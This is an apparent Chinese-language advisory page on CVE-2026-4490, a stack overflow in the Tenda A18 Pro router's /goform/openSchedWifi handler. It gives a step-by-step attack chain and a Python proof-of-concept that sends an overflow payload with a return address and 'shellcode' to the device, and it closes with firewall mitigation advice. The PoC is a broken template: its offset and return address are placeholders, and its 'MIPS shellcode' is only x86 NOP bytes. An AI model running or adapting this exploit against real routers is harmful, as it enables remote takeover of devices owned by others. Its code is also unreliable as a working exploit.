CVE-2026-4490 Tenda A18 Pro 栈溢出漏洞

漏洞信息

漏洞编号

CVE-2026-4490

漏洞类型

栈溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda A18 Pro

漏洞概述

Tenda A18 Pro 路由器固件版本 02.03.02.28 中存在严重的栈溢出漏洞，该漏洞已被分配 CVE-2026-4490 编号。问题的根源位于设备 Web 管理接口的 `/goform/openSchedWifi` 处理函数 `setSchedWifi` 中。由于代码未对用户输入进行严格的长度限制，攻击者可以通过发送特制的 HTTP 请求触发缓冲区溢出。鉴于该漏洞的 CVSS 评分为 8.8，属于高危漏洞，且允许远程低权限攻击者无需用户交互即可利用，攻击者成功利用此漏洞可在设备上执行任意代码，从而完全控制路由器，窃取网络流量或发起进一步的网络攻击。

技术细节

该漏洞属于典型的栈缓冲区溢出。在 Tenda A18 Pro 固件的 `setSchedWifi` 函数中，程序直接将 HTTP POST 或 GET 请求中的参数值复制到栈上固定大小的缓冲区中，而未使用安全拷贝函数或进行长度校验。攻击者可以通过向 `/goform/openSchedWifi` 端点提交超长字符串来覆盖栈帧中的返回地址。由于该设备通常运行在 MIPS 或 ARM 架构上，攻击者需要针对特定架构构造 Shellcode。利用过程中，攻击者首先需要确定溢出偏移量，然后填充适当的数据以对齐指令指针。一旦控制了程序计数器（PC），攻击者可以跳向 libc 中的 ROP 小工具以绕过安全防护，或者直接跳向注入的 Shellcode 执行反弹 Shell。目前已公开的 Metasploit 模块证实了利用的可行性，攻击者可借此获得设备的最高权限。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别目标设备指纹，确认为 Tenda A18 Pro 且固件版本为 02.03.02.28。

STEP 2

构造载荷

攻击者分析二进制文件确定溢出偏移量，构造包含填充数据、覆盖返回地址和 Shellcode 的恶意 HTTP 数据包。

STEP 3

漏洞利用

攻击者将构造好的恶意请求发送至目标路由器的 /goform/openSchedWifi 接口。

STEP 4

代码执行

触发栈溢出，程序流程被劫持，设备执行攻击者植入的 Shellcode，获得远程控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

def exploit(ip, port):
    # Target buffer overflow in setSchedWifi
    # Payload structure: Padding + Ret Addr + NOP Sled + Shellcode
    target_url = "/goform/openSchedWifi"
    
    # Adjust offset based on specific firmware analysis
    offset = 500 
    ret_addr = b"\x00\x40\xa0\x00" # Example return address
    
    # Simple MIPS shellcode (bind shell or reverse tcp)
    shellcode = b"\x90" * 100  
    
    payload = b"A" * offset + ret_addr + shellcode
    
    # Construct HTTP POST request
    header =  b"POST " + target_url.encode() + b" HTTP/1.1\r\n"
    header += b"Host: " + ip.encode() + b"\r\n"
    header += b"Content-Type: application/x-www-form-urlencoded\r\n"
    header += b"Content-Length: " + str(len(payload)).encode() + b"\r\n\r\n"
    
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        s.send(header + payload)
        print("[+] Payload sent successfully.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Usage: python poc.py <target_ip> <port>
    if len(sys.argv) != 3:
        print("Usage: python3 poc.py <IP> <PORT>")
    else:
        exploit(sys.argv[1], int(sys.argv[2]))

影响范围

Tenda A18 Pro 02.03.02.28

防御指南

临时缓解措施

建议用户尽快检查设备固件版本。若暂无法升级，请通过防火墙规则限制外部对路由器 Web 管理端口（默认80/8080）的访问，仅允许可信内网IP访问，并关闭路由器的远程管理功能以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4490
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4490
3 Details https://www.cvedetails.com/cve/CVE-2026-4490/
4 VulDB https://vuldb.com/cve/CVE-2026-4490
5 Link https://github.com/lilukun337/cve/issues/2
6 Link https://vuldb.com/?ctiid.352016
7 Link https://vuldb.com/?id.352016
8 Link https://vuldb.com/?submit.773670
9 Link https://www.tenda.com.cn/